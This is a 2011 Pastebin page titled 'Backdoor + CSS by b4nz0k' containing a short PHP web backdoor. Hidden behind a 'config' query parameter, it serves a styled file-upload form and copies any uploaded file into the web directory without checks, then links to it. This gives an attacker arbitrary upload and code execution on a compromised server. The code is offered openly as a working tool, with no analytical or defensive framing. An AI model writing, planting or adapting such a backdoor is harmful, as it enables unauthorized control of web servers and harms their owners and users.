Advertisement
b4nz0k

Backdoor + CSS by b4nz0k

Nov 27th, 2011
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.33 KB | None | 0 0
  1. <?php
  2. if (isset($_GET['config']))
  3. {
  4. ?>
  5. <!-- ### Dentro del HEAD -->
  6.  
  7.  
  8.   <head><title>Simple Backdoor b4nz0k</title><style type="text/css">
  9.     a:visited { text-decoration:none } a:link { text-decoration:none }
  10.     a { text-decoration:none; color:#424242; }
  11.     .upl{ font-family:Courier, monospace; background-color:#E6E6E6; border:1px;
  12.       border-color:#424242; border-style:solid; }
  13.     .upl h1 { font-variant: small-caps; letter-spacing:2px; }
  14.     input[type=file] { width:250px; margin:5px; background-color:#BDBDBD; }
  15.     input[type=file]:hover { background-color:#424242; color:#00FF00; }
  16.     input[type=submit] { margin:5px; background-color:#BDBDBD; border-style:dashed; border-color:#fff;
  17.     background-color:#000; color:#E6E6E6; }
  18.   </style>
  19.   </head>
  20. <!-- ### Dentro del HEAD -->
  21.  
  22.   <?php
  23.     echo '<div class="upl"><center><h1>BakckDoor by b4nz0k</h1><br><form action="" method="post"
  24.    enctype="multipart/form-data">
  25.    <b>Seleccione el Archivo <br> <input type="file" value="Examinar" name="archivo"><br>
  26.    <input type="submit" value="0xSubir"></form></center>';
  27.     if (isset($_FILES['archivo']))
  28.     {
  29.     $ar=$_FILES['archivo']['name'];
  30.     copy($_FILES['archivo']['tmp_name'],$_FILES['archivo']['name']);
  31.     echo '<center><h3><b>Archivo Subido en <a href="'.$ar.'">'.$ar.'</a></b></h3></center>';
  32.     }
  33. }
  34. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement